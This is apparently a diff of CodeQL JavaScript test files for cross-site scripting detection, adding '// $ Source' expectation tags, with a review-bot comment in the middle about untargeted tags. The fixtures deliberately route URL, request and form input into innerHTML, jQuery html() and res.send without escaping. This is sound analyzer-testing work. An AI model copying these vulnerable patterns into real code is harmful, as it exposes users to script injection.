$("#foo").html(target.replace(new RegExp("<|>", "g"), '')); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js index 16932da72c05..eb1074a5a62f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js 
@@ -1,5 +1,5 @@ var foo = document.getElementById("foo"); -var data = JSON.parse(decodeURIComponent(window.location.search.substr(1))); +var data = JSON.parse(decodeURIComponent(window.location.search.substr(1))); // $ Source foo.setAttribute("src", data.src); // $ Alert foo.setAttribute("HREF", data.p); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js index a1302d196a7f..a3694f3cf79e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js @@ -17,7 +17,7 @@ { name: 'dashboards', source: function (query, cb) { - var target = document.location.search + var target = document.location.search // $ Source cb(target); }, templates: { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js index 957fe1ba0497..866636f07c18 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js @@ -1,5 +1,5 @@ function test() { - let tainted = document.location.search; + let tainted = document.location.search; // $ Source $("
" + tainted + "
"); // $ Alert $(`
${tainted}
`); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/winjs.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/winjs.js index f52cb62735fb..5d2b25bed092 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/winjs.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/winjs.js @@ -1,5 +1,5 @@ function test(elt) { - var tainted = document.location.search.substring(1); + var tainted = document.location.search.substring(1); // $ Source WinJS.Utilities.setInnerHTMLUnsafe(elt, tainted); // $ Alert WinJS.Utilities.setOuterHTMLUnsafe(elt, tainted); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js index f8a3d5c09486..c330177d56a3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js @@ -1,5 +1,5 @@ (function () { - var foo = document.location; + var foo = document.location; // $ Source function inner(x) { unknown(x); @@ -114,7 +114,7 @@ var app = express(); app.get('/user/:id', function (req, res) { try { - unknown(req.params.id); + unknown(req.params.id); // $ Source } catch (e) { res.send("Exception: " + e); // $ Alert } @@ -122,7 +122,7 @@ app.get('/user/:id', function (req, res) { (function () { - sessionStorage.setItem('exceptionSession', document.location.search); + sessionStorage.setItem('exceptionSession', document.location.search); // $ Source try { unknown(sessionStorage.getItem('exceptionSession')); @@ -133,7 +133,7 @@ app.get('/user/:id', function (req, res) { app.get('/user/:id', function (req, res) { - unknown(req.params.id, (error, res) => { + unknown(req.params.id, (error, res) => { // $ Source if (error) { $('myId').html(error); // $ Alert return; 
@@ -143,7 +143,7 @@ app.get('/user/:id', function (req, res) { }); (function () { - var foo = document.location.search; + var foo = document.location.search; // $ Source new Promise(resolve => unknown(foo, resolve)).catch((e) => { $('myId').html(e); // $ Alert @@ -177,7 +177,7 @@ app.get('/user/:id', function (req, res) { })(); app.get('/user/:id', function (req, res) { - unknown(req.params.id, (error, res) => { + unknown(req.params.id, (error, res) => { // $ Source if (error) { $('myId').html(error); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js index 667bbe822140..c6be2e55e87e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js @@ -60,7 +60,7 @@ app.get('/user/:id', function (req, res) { .use(doc, { title: '👋🌍' }) .use(format) .use(html) - .process(req.body, function (err, file) { + .process(req.body, function (err, file) { // $ Source res.send(file); // $ Alert }); @@ -70,7 +70,7 @@ app.get('/user/:id', function (req, res) { res.send(unified().use(markdown).processSync(req.body).toString); // $ Alert - remark().process(req.body, (e, f) => { + remark().process(req.body, (e, f) => { // $ Source res.send(f); // $ Alert }) }); @@ -110,9 +110,9 @@ hapi.route({ }}); app.get("invalid/keys/:id", async (req, res) => { - const { keys: queryKeys } = req.query; + const { keys: queryKeys } = req.query; // $ Source const paramKeys = req.params; - const keys = queryKeys || paramKeys?.keys; + const keys = queryKeys || paramKeys?.keys; // $ Source const keyArray = typeof keys === 'string' ? [keys] : keys; const invalidKeys = keyArray.filter(key => !whitelist.includes(key)); 
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js index 5ab9f9d6f265..996f093aa15c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js @@ -132,7 +132,7 @@ function escapeHtml4(s) { } app.get('/user/:id', function (req, res) { - const url = req.params.id; + const url = req.params.id; // $ Source res.send(escapeHtml1(url)); res.send(escapeHtml2(url)); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/etherpad.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/etherpad.js index c7e60092d7ef..8377357a0c4c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/etherpad.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/etherpad.js @@ -6,7 +6,7 @@ app.get("/some/path", (req, res) => { let response = "Hello, world!"; if(req.query.jsonp && isVarName(req.query.jsonp)) - response = req.query.jsonp + "(" + response + ")"; + response = req.query.jsonp + "(" + response + ")"; // $ Source res.send(response); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js index 448f12270783..a359780e57b0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js @@ -1,7 +1,7 @@ var express = require('express'); express().get('/user/', function(req, res) { - var evil = req.query.evil; + var evil = req.query.evil; // $ Source res.send(console.log("
%s
", evil)); // OK - returns undefined res.send(util.format("
%s
", evil)); // $ Alert res.send(require("printf")("
%s
", evil)); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js index cd6ca0c9e3da..9e03025792d0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js @@ -1,13 +1,13 @@ var liveServer = require("live-server"); const middleware = [function(req, res, next) { - const tainted = req.url; + const tainted = req.url; // $ Source res.end(`${tainted}`); // $ Alert }]; middleware.push(function(req, res, next) { - const tainted = req.url; + const tainted = req.url; // $ Source res.end(`${tainted}`); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js index 105080e5fba2..a0f2120b2c4f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js @@ -10,7 +10,7 @@ app.get("/some/path", (req, res) => { res.send(x + y); // $ Alert } - let callback = sendResponse.bind(null, req.url); + let callback = sendResponse.bind(null, req.url); // $ Source [1, 2, 3].forEach(callback); }); @@ -19,7 +19,7 @@ app.get("/underscore", (req, res) => { res.send(x + y); // $ Alert } - let callback = underscore.partial(sendResponse, req.url); + let callback = underscore.partial(sendResponse, req.url); // $ Source [1, 2, 3].forEach(callback); }); @@ -28,7 +28,7 @@ app.get("/lodash", (req, res) => { res.send(x + y); // $ Alert } - let callback = lodash.partial(sendResponse, req.url); + let callback = lodash.partial(sendResponse, req.url); // $ Source [1, 2, 3].forEach(callback); }); 
@@ -37,7 +37,7 @@ app.get("/ramda", (req, res) => { res.send(x + y); // $ Alert } - let callback = R.partial(sendResponse, [req.url]); + let callback = R.partial(sendResponse, [req.url]); // $ Source [1, 2, 3].forEach(callback); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js index 392a1f7ec612..41eb48b68d65 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js @@ -2,7 +2,7 @@ let express = require('express'); let app = express(); app.get("/some/path", (req, res) => { - new Promise((resolve, reject) => resolve(req.query.data)) + new Promise((resolve, reject) => resolve(req.query.data)) // $ Source .then(x => res.send(x)); // $ Alert new Promise((resolve, reject) => resolve(req.query.data)) diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js index 35021ea39120..660743338848 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js @@ -3,7 +3,7 @@ var express = require('express'); var app = express(); app.get('/user/:id', function(req, res) { - let { p, q: r } = req.params; + let { p, q: r } = req.params; // $ Source res.send(p); // $ Alert res.send(r); // $ Alert }); @@ -11,7 +11,7 @@ app.get('/user/:id', function(req, res) { const aKnownValue = "foo"; app.get('/bar', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source if (p == aKnownValue) res.send(p); @@ -27,7 +27,7 @@ app.get('/bar', function(req, res) { const clone = require('clone'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var obj = {}; obj.p = p; 
@@ -40,7 +40,7 @@ app.get('/baz', function(req, res) { const serializeJavaScript = require('serialize-javascript'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var serialized = serializeJavaScript(p); @@ -54,7 +54,7 @@ app.get('/baz', function(req, res) { const fclone = require('fclone'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var obj = {}; obj.p = p; @@ -66,7 +66,7 @@ app.get('/baz', function(req, res) { const jc = require('json-cycle'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var obj = {}; obj.p = p; @@ -79,7 +79,7 @@ app.get('/baz', function(req, res) { const sortKeys = require('sort-keys'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var obj = {}; obj.p = p; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js index 61d153498e74..5419959d61ec 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js @@ -2,12 +2,12 @@ var express = require('express'); var app = express(); app.enable('x-powered-by').disable('x-powered-by').get('/', function (req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source res.send(p); // $ Alert }); const prettier = require("prettier"); app.post("foobar", function (reg, res) { - const code = prettier.format(reg.body, { semi: false, parser: "babel" }); + const code = prettier.format(reg.body, { semi: false, parser: "babel" }); // $ Source res.send(code); // $ Alert }); \ No newline at end of file 
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js index be96d05a400a..0233339ad26e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js @@ -4,7 +4,7 @@ var fs = require('fs'); var express = require('express'); express().get('/', function(req, res) { - fs.readdir("/myDir", function (error, files1) { + fs.readdir("/myDir", function (error, files1) { // $ Source res.send(files1); // $ Alert }); }); @@ -22,7 +22,7 @@ http.createServer(function (req, res) { return files3.join(''); } - fs.readdir("/myDir", function (error, files1) { + fs.readdir("/myDir", function (error, files1) { // $ Source res.write(files1); // $ Alert var dirs = []; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js index 4f712f2604e7..2569f5623d74 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js @@ -3,6 +3,6 @@ const parseTorrent = require('parse-torrent'), express().get('/user/:id', function(req, res) { let torrent = parseTorrent(unknown), - name = torrent.name; + name = torrent.name; // $ Source res.send(name); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js index fb229199e687..40f33d8edb3f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js 
@@ -8,7 +8,7 @@ $("" + $.trim("foo") + ""); })); -$.fn.myPlugin = function (stuff, options) { +$.fn.myPlugin = function (stuff, options) { // $ Source $("#foo").html("" + options.foo + ""); // $ Alert $("#foo").html("" + stuff + ""); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts index 9c48ed8c23f5..7e546c05d103 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts @@ -1,4 +1,4 @@ -export function trivialXss(s: string) { +export function trivialXss(s: string) { // $ Source const html = "" + s + ""; // $ Alert document.querySelector("#html").innerHTML = html; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts index 3ec0e2007396..a69e6e5626d7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts @@ -1,9 +1,9 @@ -export function trivialXss(s: string) { +export function trivialXss(s: string) { // $ Source const html = "" + s + ""; // $ Alert - this file is recognized as a main file. document.querySelector("#html").innerHTML = html; } -export function objectStuff(settings: any, i: number) { +export function objectStuff(settings: any, i: number) { // $ Source document.querySelector("#html").innerHTML = "" + settings + ""; // $ Alert var name; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts index 9566ce8468a8..3c7ac0103431 100644 
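Review bot: The bare `// $ Source` added to `export function objectStuff(settings: any, i: number) {` in lib2/index.ts does not say which of the two parameters is the expected source, and the same applies to `$.fn.myPlugin = function (stuff, options) {` in jquery-plugin.js on this line and to `$.fn.my_plugin = function my_plugin(element, options) {` in unsafe-jquery-plugin.js further down. A tag without a value matches every result reported on that line, so a second parameter starting or ceasing to be treated as a source would leave the test outcome unchanged. If the postprocessing query attaches a value to Source results, a valued form such as `// $ Source=settings` would pin the expectation to the intended parameter; if it does not, a trailing remark in the style already used on this page, e.g. `// $ Source - settings only`, would at least record the intent for the reader. The body of objectStuff continues outside the hunk.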
--- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts @@ -1,4 +1,4 @@ -export function trivialXss(s: string) { +export function trivialXss(s: string) { // $ Source const html = "" + s + ""; // $ Alert - this file is not recognized as a main file. document.querySelector("#html").innerHTML = html; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js index 061a82c862d7..78da04582957 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js @@ -1,14 +1,14 @@ -module.exports.xssThroughHTMLConstruction = function (s) { +module.exports.xssThroughHTMLConstruction = function (s) { // $ Source const html = "" + s + "";// $ Alert document.querySelector("#html").innerHTML = html; } -module.exports.xssThroughXMLParsing = function (s) { +module.exports.xssThroughXMLParsing = function (s) { // $ Source const doc = new DOMParser().parseFromString(s, "text/xml"); // $ Alert document.querySelector("#xml").appendChild(doc.documentElement); } -module.exports.xssThroughMoreComplexXMLParsing = function (s) { +module.exports.xssThroughMoreComplexXMLParsing = function (s) { // $ Source const doc = new DOMParser().parseFromString(s, "text/xml"); // $ Alert const xml = doc.documentElement; @@ -18,7 +18,7 @@ module.exports.xssThroughMoreComplexXMLParsing = function (s) { } const markdown = require('markdown-it')({html: true}); -module.exports.xssThroughMarkdown = function (s) { +module.exports.xssThroughMarkdown = function (s) { // $ Source const html = markdown.render(s); // $ Alert document.querySelector("#markdown").innerHTML = html; } 
@@ -53,7 +53,7 @@ module.exports.createsClass = function (s) { return new Foo(s); } -$.fn.xssPlugin = function (options) { +$.fn.xssPlugin = function (options) { // $ Source const defaults = { name: "name" }; @@ -63,7 +63,7 @@ $.fn.xssPlugin = function (options) { }); } -module.exports.guards = function (attrVal) { +module.exports.guards = function (attrVal) { // $ Source document.querySelector("#id").innerHTML = "\"""; // $ Alert document.querySelector("#id").innerHTML = "\"""; if (attrVal.indexOf("\"") === -1 && attrVal.indexOf("'") === -1) { @@ -76,7 +76,7 @@ module.exports.intentionalTemplate = function (obj) { document.querySelector("#template").innerHTML = html; } -module.exports.types = function (val) { +module.exports.types = function (val) { // $ Source if (typeof val === "string") { $("#foo").html("" + val + ""); // $ Alert } else if (typeof val === "number") { @@ -90,12 +90,12 @@ function createHTML(x) { return "" + x + ""; // $ Alert } -module.exports.usesCreateHTML = function (x) { +module.exports.usesCreateHTML = function (x) { // $ Source $("#foo").html(createHTML(x)); } const myMermaid = require('mermaid'); -module.exports.usesCreateHTML = function (x) { +module.exports.usesCreateHTML = function (x) { // $ Source myMermaid.render("id", x, function (svg) { // $ Alert $("#foo").html(svg); }); @@ -113,7 +113,7 @@ module.exports.usesCreateHTML = function (x) { }); } -module.exports.xssThroughMarkdown = function (s) { +module.exports.xssThroughMarkdown = function (s) { // $ Source const html = markdown.render(s); // $ Alert document.querySelector("#markdown").innerHTML = html; } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts index a00719d74408..1c50460050cf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts 
+++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts @@ -1,9 +1,9 @@ -export function basicHtmlConstruction(s: string) { +export function basicHtmlConstruction(s: string) { // $ Source const html = "" + s + ""; // $ Alert document.body.innerHTML = html; } -export function insertIntoCreatedDocument(s: string) { +export function insertIntoCreatedDocument(s: string) { // $ Source const newDoc = document.implementation.createHTMLDocument(""); newDoc.body.innerHTML = "" + s + ""; // $ SPURIOUS: Alert - inserted into document disconnected from the main DOM. } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js index 896c4f8af210..315644f407df 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js @@ -1,5 +1,5 @@ (function(){ - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source $(options); // $ Alert - or is it? $(options.target); // $ Alert @@ -62,18 +62,18 @@ }; - $.fn.my_plugin = function my_plugin(element, options) { + $.fn.my_plugin = function my_plugin(element, options) { // $ Source this.$element = $(element); this.options = $.extend({}, options); if (this.options.parent) this.$parent = $(this.options.parent) // $ Alert }; - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source $(options.foo.bar.baz); // $ Alert $(options.html); }; - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source $(x).appendTo(options.foo.bar.baz); // $ Alert }; 
@@ -81,7 +81,7 @@ $("#" + options.target); }; - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source function f(o) { this.o = $.extend({}, o); var t = this.o.target; @@ -98,7 +98,7 @@ $(target); }; - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source options = $.extend({ menu: '
', target: '.my_plugin' @@ -111,28 +111,28 @@ menu: '
', target: '.my_plugin' }; - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source options = $.extend({}, $.fn.my_plugin.defaults, options); $(options.menu); $(options.target); // $ Alert }; var pluginName = "my_plugin"; - $.fn[pluginName] = function my_plugin(options) { + $.fn[pluginName] = function my_plugin(options) { // $ Source $(options.target); // $ Alert }; $.extend($.fn, { - my_plugin: function my_plugin(options) { + my_plugin: function my_plugin(options) { // $ Source $(options.target); // $ Alert } }); - $.fn.affix = function my_plugin(options) { + $.fn.affix = function my_plugin(options) { // $ Source $(options.target); // $ Alert }; - $.fn.tooltip = function my_plugin(options) { + $.fn.tooltip = function my_plugin(options) { // $ Source $(options.viewport.selector); // $ Alert }; @@ -150,14 +150,14 @@ $(unintentional); // OK - but should be flagged by another query } - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source let target = options.target; target === DEFAULTS.target? $(target): $(document).find(target); options.target === DEFAULTS.target? $(options.target): $(document).find(options.target); options.targets.a === DEFAULTS.target? $(options.target.a): $(document).find(options.target.a); // $ SPURIOUS: Alert - should be sanitized by `MembershipTestSanitizer` - but still flagged because `AccessPath` can't handle these deeply nested properties } - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source $(anyPrefix + options.target); // OK - unlikely to be a html/css prefix confusion $(something.replace("%PLACEHOLDER%", options.target)); // OK - (unlikely to be a html/css prefix confusion); 
@@ -175,14 +175,14 @@ function setupPlugin(o) { $.fn.my_plugin = o.f } - setupPlugin({f: function(options) { + setupPlugin({f: function(options) { // $ Source $(options.target); // $ Alert }}); setupPlugin({f:function(options) { $(document).find(options.target); }}); - $.fn.position = function( options ) { + $.fn.position = function( options ) { // $ Source if ( !options || !options.of ) { return doSomethingElse( this, arguments ); } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts index e9ca1f400890..084950e8e08e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts @@ -9,7 +9,7 @@ import { NgForm } from "@angular/forms"; ` }) export class Foo { - field: string = ""; + field: string = ""; // $ Source safeField: string = ""; setInput1(event) { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js index c78fc9284a15..e57ef84dc429 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js @@ -5,10 +5,10 @@ const FormikBasic = () => (
{ + validate={values => { // $ Source $("#id").html(values.foo); // $ Alert }} - onSubmit={(values, { setSubmitting }) => { + onSubmit={(values, { setSubmitting }) => { // $ Source $("#id").html(values.bar); // $ Alert }} > @@ -21,17 +21,17 @@ const FormikBasic = () => ( const FormikEnhanced = withFormik({ mapPropsToValues: () => ({ name: '' }), - validate: values => { + validate: values => { // $ Source $("#id").html(values.email); // $ Alert }, - handleSubmit: (values, { setSubmitting }) => { + handleSubmit: (values, { setSubmitting }) => { // $ Source $("#id").html(values.email); // $ Alert } })(MyForm); (function () { - const { values, submitForm } = useFormikContext(); + const { values, submitForm } = useFormikContext(); // $ Source $("#id").html(values.email); // $ Alert $("#id").html(submitForm.email); @@ -41,7 +41,7 @@ import { Form } from 'react-final-form' const App = () => (
{ + onSubmit={async values => { // $ Source $("#id").html(values.stooge); // $ Alert }} initialValues={{ stooge: 'larry', employed: false }} @@ -68,7 +68,7 @@ import { useForm } from 'react-hook-form'; function HookForm() { const { register, handleSubmit, errors } = useForm(); // initialize the hook - const onSubmit = (data) => { + const onSubmit = (data) => { // $ Source $("#id").html(data.name); // $ Alert }; @@ -89,7 +89,7 @@ function HookForm2() {